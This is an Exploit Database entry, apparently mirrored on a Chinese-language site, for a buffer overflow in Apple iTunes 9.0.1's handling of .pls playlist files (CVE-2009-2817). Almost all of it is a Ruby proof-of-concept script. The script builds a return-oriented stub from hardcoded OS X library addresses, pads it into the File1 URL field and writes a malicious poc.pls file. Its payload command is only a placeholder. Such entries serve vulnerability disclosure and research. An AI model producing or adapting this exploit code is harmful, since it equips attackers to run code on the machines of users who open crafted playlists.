Apple iTunes 9.0.1 – ‘.pls’ Handling Buffer Overflow

• Exploit Database
• 51 阅读

• 作者： S2 Crew
  日期： 2010-02-17
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/11491/

• # Exploit Title: iTunes .pls file handling buffer overflow
  # Date: 2009.12.20
  # Author: S2 Crew [Hungary]
  # Software Link: -
  # Version: 9.0
  # Tested on: OSX 10.5.8, Windows XP SP2
 (/GS flag, DOS)
  # CVE: CVE-2009-2817
  
  # Code:
  
  #!/usr/bin/env ruby
  
  SETJMP = 0x92F04224
  JMP_BUF = 0x8fe31290
  STRDUP = 0x92EED110
  # 8fe24459 jmp *%eax
  JMP_EAX = 0x8fe24459
  
  def make_exec_payload_from_heap_stub()
  frag0 =
  "\x90" + # nop
  "\x58" + # pop eax
  "\x61" + # popa
  "\xc3" # ret
  frag1 =
  "\x90" + # nop
  "\x58" + # pop eax
  "\x89\xe0" + # mov eax, esp
  "\x83\xc0\x0c" + # add eax, byte +0xc
  "\x89\x44\x24\x08" + # mov [esp+0x8], eax
  "\xc3" # ret
  exec_payload_from_heap_stub =
  frag0 +
  [SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
  frag1 +
  "X" * 20 +
  [SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
  JMP_EAX].pack("V5") +
  "X" * 4
  end
  
  payload_cmd = "hereisthetrick"
  stub = make_exec_payload_from_heap_stub()
  ext = "A" * 59
  stub = make_exec_payload_from_heap_stub()
  exploit = ext + stub + payload_cmd
  
  # pls file format
  
  file = "\n"
  file += "NumberOfEntries=1\n"
  file += "File1=http://1/asdf." + exploit + "\n"
  file += "Title1=asdf\n"
  file += "Length1=100\n"
  file += "Version=2" + '\n'
  
  File.open('poc.pls','w') do |f|
  f.puts file
  f.close
  end